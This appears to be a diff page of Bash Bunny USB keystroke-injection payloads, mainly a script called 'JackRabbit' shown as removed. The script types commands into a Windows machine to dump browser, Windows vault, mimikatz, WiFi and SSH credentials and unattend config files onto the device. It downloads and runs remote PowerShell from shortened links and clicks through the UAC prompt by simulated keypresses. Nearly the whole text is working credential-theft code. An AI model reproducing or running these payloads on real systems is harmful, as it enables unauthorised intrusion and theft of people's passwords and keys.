Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
||||
@@ -1,162 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: JackRabbit
|
||||
# Author: illwill
|
||||
# Version: 0.1
|
||||
#
|
||||
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
|
||||
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
|
||||
#
|
||||
# Credits to these guys for their powershell scripts:
|
||||
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
|
||||
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
|
||||
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
|
||||
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
|
||||
|
||||
#script
|
||||
# Purple...............Jackin dat loot
|
||||
# Green................Jacked dat loot
|
||||
# Red Blue.............PoPo caught yo ass
|
||||
|
||||
|
||||
LED R B 200
|
||||
LOOTDIR=/root/udisk/loot/JackRabbit
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING POWERSHELL
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Make the loot folder of the computername
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING md \$LOOTDIR2
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Credential Vault (I.E./Edge)
|
||||
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
|
||||
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
|
||||
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
|
||||
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Chrome Creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
# Open 32bit powershell and Jackin' Firefox Creds
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
# UAC Bypass
|
||||
Q GUI r
|
||||
Q STRING powershell -c "Start-Process powershell -verb runas"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
Q LEFTARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Windows creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
# Jackin' Wifi creds
|
||||
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
|
||||
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
|
||||
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
|
||||
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' SSH Creds
|
||||
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' dem install configs
|
||||
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
|
||||
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Output DONE to root of USB file to let bashbunny we're all good in the hood
|
||||
Q DELAY 100
|
||||
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Eject the USB Safely
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
|
||||
#Sync Drive
|
||||
sync
|
||||
|
||||
|
||||
FILE="/root/udisk/loot/DONE"
|
||||
while [ ! -e $FILE ]; do sleep 1; done;
|
||||
sleep 1;
|
||||
if [ -e $FILE ]; then rm -f $FILE; LED G 200
|
||||
else LED R;
|
||||
for (( ; ; ))
|
||||
do
|
||||
LED R;
|
||||
sleep 1;
|
||||
LED B;
|
||||
sleep 1;
|
||||
done
|
||||
fi
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user